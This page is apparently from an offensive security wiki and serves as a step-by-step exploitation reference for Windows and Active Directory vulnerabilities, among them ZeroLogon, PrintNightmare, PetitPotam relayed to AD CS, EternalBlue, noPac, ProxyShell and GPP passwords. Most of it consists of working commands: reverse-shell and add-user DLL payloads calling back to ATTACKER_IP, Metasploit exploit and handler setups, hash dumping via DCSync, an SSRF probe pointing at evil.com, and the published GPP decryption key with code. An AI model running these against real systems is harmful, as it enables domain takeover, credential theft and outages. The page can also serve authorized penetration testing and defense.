Exploitation

Known Vulnerabilities

Critical Windows and Active Directory vulnerabilities commonly found in enterprise environments.

Danger

These exploits can cause service disruption or system instability. Always test in controlled environments and have rollback plans.

Prerequisites & Tool Installation

Many exploits on this page require third-party tools. Here's how to obtain them:

Essential Tools

Impacket - Python AD toolkit

pip install impacket

GitHub: fortra/impacket

CrackMapExec - Network pentesting

pipx install crackmapexec

GitHub: Porchetta-Industries/CrackMapExec

Certipy - AD CS exploitation

pip install certipy-ad

GitHub: ly4k/Certipy

Metasploit - Exploitation framework

apt install metasploit-framework

Pre-installed on Kali Linux

ZeroLogon (CVE-2020-1472)

Cryptographic flaw in Netlogon allows unauthenticated attacker to take over Domain Controller. Patches released August 2020.

CVSS Score: 10.0 (Critical)

Impact: Full domain compromise without authentication

Affected: Windows Server 2008 R2 through 2019

Tool Installation

bash 
# Clone the ZeroLogon checker/exploit
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt

# Alternative: dirkjanm's CVE-2020-1472
git clone https://github.com/dirkjanm/CVE-2020-1472.git

Check Vulnerability

bash 
# Check if DC is vulnerable (SecuraBV scanner)
python zerologon_tester.py DC_NETBIOS_NAME DC_IP

# CrackMapExec module (built-in)
crackmapexec smb 192.168.1.100 -u '' -p '' -M zerologon

# Nmap script
nmap -p135,445 --script smb-vuln-cve-2020-1472 192.168.1.100

Exploit ZeroLogon

Warning

CAUTION: This exploit sets the DC machine account password to empty, which breaks AD replication and Kerberos authentication. Have a restoration plan ready.
bash 
# Set DC password to empty (DANGEROUS - breaks replication!)
python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP

# Dump hashes with empty password
secretsdump.py -no-pass -just-dc DC_NETBIOS_NAME\$@DC_IP

# Restore DC password (CRITICAL!)
# First, get the machine account hash from secretsdump output
secretsdump.py administrator@DC_IP -hashes :ADMIN_HASH

# Use restorepassword.py from dirkjanm's repo
# Get the original hex password from the secretsdump output
python restorepassword.py DC_NETBIOS_NAME@DC_NETBIOS_NAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD

⚠️ Password Restoration Process

  1. Before exploiting, note the DC NetBIOS name exactly as shown in AD
  2. After secretsdump, look for DC_NAME$:plain_password_hex: in output
  3. Save this hex value - you'll need it to restore
  4. Run restorepassword.py immediately after obtaining admin access
  5. Verify restoration by checking DC replication status

Danger

ZeroLogon sets the DC machine account password to empty, breaking AD replication. Always restore immediately after exploitation or use safer post-exploit methods.

PrintNightmare (CVE-2021-1675/34527)

Remote code execution via Print Spooler service. Works on DCs and workstations. Patches released July 2021.

CVSS Score: 8.8 (High)

Impact: Remote code execution as SYSTEM

Affected: All Windows versions with Print Spooler enabled

Tool Installation

bash 
# cube0x0's PrintNightmare exploit (most reliable)
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675
pip install -r requirements.txt

# Note: Requires modified impacket for some versions
git clone https://github.com/cube0x0/impacket
cd impacket
python setup.py install

Check Vulnerability

bash 
# Check if Print Spooler is running (must return MS-RPRN)
rpcdump.py @192.168.1.100 | grep -i spoolsv
rpcdump.py @192.168.1.100 | grep -i 'MS-RPRN'

# CrackMapExec module
crackmapexec smb 192.168.1.0/24 -u user -p pass -M spooler

# Nmap
nmap -p445 --script smb-enum-services 192.168.1.100

Exploit PrintNightmare

Step 1: Create a malicious DLL payload

bash 
# Meterpreter reverse shell DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Stageless reverse shell (more reliable)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Add user DLL (create admin user)
msfvenom -p windows/adduser USER=hacker PASS=Hacker123! -f dll -o adduser.dll

Step 2: Host the DLL on an SMB share (target must be able to reach attacker)

bash 
# Start SMB server (Impacket)
smbserver.py share $(pwd) -smb2support

# With authentication (if needed)
smbserver.py share $(pwd) -smb2support -username user -password pass

Step 3: Start listener (if using reverse shell)

bash 
# Metasploit listener
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
run

# Netcat listener (for stageless shell)
nc -lvnp 4444

Step 4: Execute the exploit

bash 
# cube0x0's version (recommended)
python CVE-2021-1675.py corp.local/user:password@192.168.1.100 '\\ATTACKER_IP\share\evil.dll'

# Specify driver name (if default fails)
python CVE-2021-1675.py corp.local/user:password@192.168.1.100 '\\ATTACKER_IP\share\evil.dll' 'Microsoft XPS Document Writer v5'

Information

Troubleshooting: If the exploit fails, ensure: (1) SMB share is accessible from target, (2) Print Spooler is running, (3) Target hasn't been patched, (4) Try different driver names.

PetitPotam (CVE-2021-36942)

Coerce Windows hosts to authenticate to attacker via MS-EFSRPC. Chain with NTLM relay for domain takeover.

CVSS Score: N/A (Authentication Coercion)

Impact: Force NTLM authentication from any Windows host

Best Used With: NTLM Relay to AD CS, LDAP, or SMB

Tool Installation

bash 
# PetitPotam exploit
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam

# Dependencies (uses Impacket)
pip install impacket

Basic Usage

bash 
# Unauthenticated coercion (works on unpatched systems)
python PetitPotam.py ATTACKER_IP TARGET_IP

# Authenticated (works even on patched systems)
python PetitPotam.py -d corp.local -u user -p password ATTACKER_IP TARGET_IP

# Using NTLM hash
python PetitPotam.py -d corp.local -u user -hashes :NTLM_HASH ATTACKER_IP TARGET_IP

Attack Chain: PetitPotam + AD CS (ESC8)

This is the most powerful use case - coerce DC to authenticate, relay to AD CS, and obtain a certificate for the DC.

Prerequisites:

  • AD Certificate Services (AD CS) installed in domain
  • Web enrollment enabled on CA (certsrv endpoint)
  • EPA (Extended Protection for Authentication) not enforced
bash 
# Step 1: Find AD CS servers
crackmapexec ldap DC_IP -u user -p pass -M adcs
certipy find -u user@corp.local -p password -dc-ip DC_IP

# Step 2: Start NTLM relay to AD CS (Terminal 1)
sudo ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 3: Trigger PetitPotam (Terminal 2)
python PetitPotam.py ATTACKER_IP DC_IP

# Step 4: Use obtained certificate to authenticate as DC
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Step 5: DCSync with obtained hash
secretsdump.py -hashes :NTLM_HASH corp.local/DC_NAME\$@DC_IP

Tip

Alternative Coercion Methods: If PetitPotam is patched, try other coercion techniques: Coercer tool tests multiple methods (MS-RPRN, MS-EFSR, MS-FSRVP, etc.) - GitHub: p0dalirius/Coercer

EternalBlue (MS17-010)

SMBv1 remote code execution. Still found in legacy environments. Patches released March 2017.

CVSS Score: 8.1 (High)

Impact: Remote code execution as SYSTEM (no authentication)

Affected: Windows XP through Windows Server 2008 R2 (unpatched)

Notable: Used in WannaCry and NotPetya ransomware

Check Vulnerability

bash 
# Nmap script (most reliable detection)
nmap -p445 --script smb-vuln-ms17-010 192.168.1.100
nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24

# CrackMapExec (doesn't require credentials)
crackmapexec smb 192.168.1.0/24 -u '' -p '' -M ms17-010

# Metasploit scanner
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run

Exploit EternalBlue

Option 1: Metasploit (Most Reliable)

bash 
# Metasploit EternalBlue exploit
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
exploit

# For 32-bit targets
set PAYLOAD windows/meterpreter/reverse_tcp

Option 2: Standalone Python Exploit

bash 
# worawit's MS17-010 exploit collection
git clone https://github.com/worawit/MS17-010.git
cd MS17-010

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f raw -o shellcode.bin EXITFUNC=thread

# Merge shellcode with exploit
python shellcode_patcher.py shellcode.bin

# Run exploit (different scripts for different targets)
python eternalblue_exploit7.py 192.168.1.100 shellcode.bin  # Windows 7
python eternalblue_exploit8.py 192.168.1.100 shellcode.bin  # Windows 8/2012

Warning

EternalBlue can cause system instability or crashes. Have a plan if the target system becomes unresponsive. In production environments, use with caution.

sAMAccountName Spoofing (CVE-2021-42278/42287)

Exploit machine account name confusion to impersonate Domain Controller. Also known as "noPac". Patches released November 2021.

CVSS Score: 8.8 (High) - combined

Impact: Domain Admin from any domain user

Requires: Valid domain user credentials, ability to create machine accounts (default)

Tool Installation

bash 
# noPac - automated exploit (recommended)
git clone https://github.com/Ridter/noPac.git
cd noPac
pip install -r requirements.txt

# Alternative: cube0x0's version
git clone https://github.com/cube0x0/noPac.git

Check Vulnerability

bash 
# Check MAQ (Machine Account Quota) - default is 10
crackmapexec ldap DC_IP -u user -p password -M maq

# Manual LDAP query
ldapsearch -x -H ldap://DC_IP -D 'user@corp.local' -w 'password' -b 'DC=corp,DC=local' '(objectClass=domain)' ms-DS-MachineAccountQuota

Exploit noPac

Automated Exploitation:

bash 
# Dump domain hashes (DCSync)
python noPac.py corp.local/user:password -dc-ip DC_IP -dc-host DC_NAME --impersonate administrator -dump

# Get interactive shell on DC
python noPac.py corp.local/user:password -dc-ip DC_IP -dc-host DC_NAME --impersonate administrator -shell

# Specify target user to impersonate
python noPac.py corp.local/user:password -dc-ip DC_IP -dc-host DC_NAME --impersonate 'Domain Admin'

Manual Exploitation (understanding the attack):

bash 
# Step 1: Create a machine account
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Password123' -dc-ip DC_IP corp.local/user:password

# Step 2: Clear the SPN on the machine account
addspn.py -u 'corp.local\YOURPC$' -p 'Password123' -c 'YOURPC$' --clear DC_IP

# Step 3: Rename machine account to match DC
renameMachine.py -current-name 'YOURPC$' -new-name 'DC$' -dc-ip DC_IP corp.local/user:password

# Step 4: Request TGT for the renamed machine account
getTGT.py -dc-ip DC_IP 'corp.local/DC$:Password123'

# Step 5: Rename back (so we can request S4U2self)
renameMachine.py -current-name 'DC$' -new-name 'YOURPC$' -dc-ip DC_IP corp.local/user:password

# Step 6: Request service ticket using S4U2self
export KRB5CCNAME=DC\$.ccache
getST.py -spn cifs/DC.corp.local -impersonate administrator corp.local/YOURPC\$ -k -no-pass

# Step 7: Use the ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass DC.corp.local

Information

The noPac automated script handles all these steps. Manual exploitation helps understand the vulnerability for reporting and remediation guidance.

ProxyLogon/ProxyShell (Exchange)

Exchange Server pre-auth RCE vulnerabilities. Often leads to domain compromise.

ProxyLogon: CVE-2021-26855, CVE-2021-27065

Patches: March 2021

CVSS: 9.8 (Critical)

ProxyShell: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207

Patches: April-May 2021

CVSS: 9.8 (Critical)

Tool Installation

bash 
# ProxyLogon/ProxyShell exploit collection
git clone https://github.com/hausec/ProxyLogon.git
git clone https://github.com/ktecv2000/ProxyShell.git

# Exchange exploitation toolkit
pip install exchangelib

Check Vulnerability

bash 
# ProxyLogon check - SSRF to autodiscover
curl -k 'https://exchange.corp.local/autodiscover/autodiscover.json?@evil.com/owa/&Email=autodiscover/autodiscover.json%3F@evil.com'

# Check Exchange version (exposed in headers)
curl -k -s https://exchange.corp.local/owa/ -I | grep 'X-OWA-Version'

# Nmap script
nmap -p443 --script http-vuln-cve2021-26855 exchange.corp.local

# Metasploit scanner
msfconsole -q
use auxiliary/scanner/http/exchange_proxylogon
set RHOSTS exchange.corp.local
run

Exploit ProxyShell

bash 
# Metasploit ProxyShell RCE
msfconsole -q
use exploit/windows/http/exchange_proxyshell_rce
set RHOSTS exchange.corp.local
set EMAIL user@corp.local
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
exploit

# Standalone exploit (drop web shell)
python proxyshell_exploit.py -t https://exchange.corp.local -e user@corp.local

Information

Exchange servers are often highly privileged in AD environments. Compromising Exchange frequently leads to domain admin via Exchange trusted subsystem permissions or credential theft from mailboxes.

GPP Passwords (MS14-025)

Group Policy Preferences stored credentials in SYSVOL with weak AES encryption. Microsoft published the decryption key.

Affected Files: Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml, Drives.xml

Location: \\\\DOMAIN\\SYSVOL\\DOMAIN\\Policies\\

Note: Patched in 2014, but legacy GPPs may still contain passwords

Manual Search

bash 
# Search SYSVOL for cpassword attribute
findstr /S /I cpassword \\corp.local\sysvol\corp.local\policies\*.xml

# PowerShell search
Get-ChildItem -Path '\\corp.local\SYSVOL\corp.local\Policies' -Recurse -Include *.xml | Select-String -Pattern 'cpassword'

# Linux - mount and search
mount -t cifs //DC_IP/SYSVOL /mnt/sysvol -o user=user,password=pass
grep -ri 'cpassword' /mnt/sysvol/

Automated Tools

bash 
# CrackMapExec module
crackmapexec smb DC_IP -u user -p pass -M gpp_password

# Metasploit module
msfconsole -q
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run

# Get-GPPPassword PowerShell script (PowerSploit)
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

Decrypt GPP Password

bash 
# Using gpp-decrypt (Kali built-in)
gpp-decrypt "ENCRYPTED_CPASSWORD_HERE"

# Example:
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# Python alternative
python -c "
import base64
from Crypto.Cipher import AES
key = bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b')
cipher = AES.new(key, AES.MODE_CBC, b'\x00'*16)
print(cipher.decrypt(base64.b64decode('ENCRYPTED_CPASSWORD_HERE')).decode())
"

Tip

Even if the patch is applied, old Group Policy Preferences may still contain credentials. Always check SYSVOL during assessments.

LLMNR/NBT-NS Poisoning (Not patched)

Protocol weakness - not a CVE but extremely common in enterprise networks. Can be mitigated via GPO but rarely is.

Protocols: LLMNR (UDP 5355), NBT-NS (UDP 137), mDNS (UDP 5353)

Impact: Capture NTLMv2 hashes, relay authentication

Mitigation: Disable via GPO, but requires testing and rarely done

bash 
# See Credential Attacks page for full details
sudo responder -I eth0 -dwPv

# Passive mode (listening only, no poisoning)
sudo responder -I eth0 -A

For comprehensive LLMNR/NBT-NS techniques, see the Credential Attacks page.

Additional High-Impact CVEs

CVE Name Impact Resource
CVE-2022-26923 Certifried Domain user to Domain Admin via AD CS Certipy
CVE-2022-33679 Kerberos RC4 Downgrade Capture AS-REP for any user PoC
CVE-2022-37958 SPNEGO NEGOEX RCE RCE via SMB/RDP (pre-auth) Metasploit module
CVE-2023-23397 Outlook NTLM Leak Capture NTLM via calendar invite PoC
CVE-2024-26198 Exchange OWA RCE Pre-auth RCE on Exchange Check vendor advisories

Vulnerability Scanning

Use these commands to quickly scan for multiple vulnerabilities across a network.

Nmap Vulnerability Scripts

bash 
# All vulnerability scripts (comprehensive but slow)
nmap -p- --script vuln 192.168.1.100

# Common Windows SMB vulnerabilities
nmap -p445 --script 'smb-vuln*' 192.168.1.0/24

# Specific high-priority checks
nmap -p445 --script smb-vuln-ms17-010,smb-vuln-cve-2020-0796 192.168.1.0/24

# RDP vulnerabilities (BlueKeep etc)
nmap -p3389 --script 'rdp-vuln*' 192.168.1.0/24

# All common Windows ports
nmap -p135,139,445,3389,5985,5986 --script vuln 192.168.1.100

CrackMapExec Modules

bash 
# List all available modules
crackmapexec smb -L

# Run critical vulnerability checks
crackmapexec smb 192.168.1.0/24 -u user -p pass -M zerologon
crackmapexec smb 192.168.1.0/24 -u user -p pass -M petitpotam
crackmapexec smb 192.168.1.0/24 -u '' -p '' -M ms17-010
crackmapexec smb 192.168.1.0/24 -u user -p pass -M spooler
crackmapexec smb 192.168.1.0/24 -u user -p pass -M gpp_password
crackmapexec smb 192.168.1.0/24 -u user -p pass -M gpp_autologin

Automated Scanning Script

bash 
#!/bin/bash
# quick_vuln_scan.sh - Run against target range
TARGET=$1
USER=$2
PASS=$3

echo "[*] Scanning $TARGET for common vulnerabilities..."

echo "[+] Checking MS17-010 (EternalBlue)..."
crackmapexec smb $TARGET -u '' -p '' -M ms17-010 2>/dev/null

echo "[+] Checking ZeroLogon..."
crackmapexec smb $TARGET -u '' -p '' -M zerologon 2>/dev/null

echo "[+] Checking PetitPotam..."
crackmapexec smb $TARGET -u $USER -p $PASS -M petitpotam 2>/dev/null

echo "[+] Checking Print Spooler..."
crackmapexec smb $TARGET -u $USER -p $PASS -M spooler 2>/dev/null

echo "[+] Checking GPP Passwords..."
crackmapexec smb $TARGET -u $USER -p $PASS -M gpp_password 2>/dev/null

echo "[*] Scan complete!"

Tip

Many of these vulnerabilities have been patched but remain prevalent in environments with poor patch management. Always check patch levels during enumeration.

External Resources

PayloadsAllTheThings

Comprehensive exploit payload collection

Windows Kernel Exploits

Collection of Windows privesc exploits

CVE Details

Windows Server vulnerability database

HackTricks AD

Active Directory attack methodology

Related Topics

Credential Dumping

Extract credentials

Post-Exploitation

Maintain access and pivot

Exploitation Overview

Back to main exploitation guide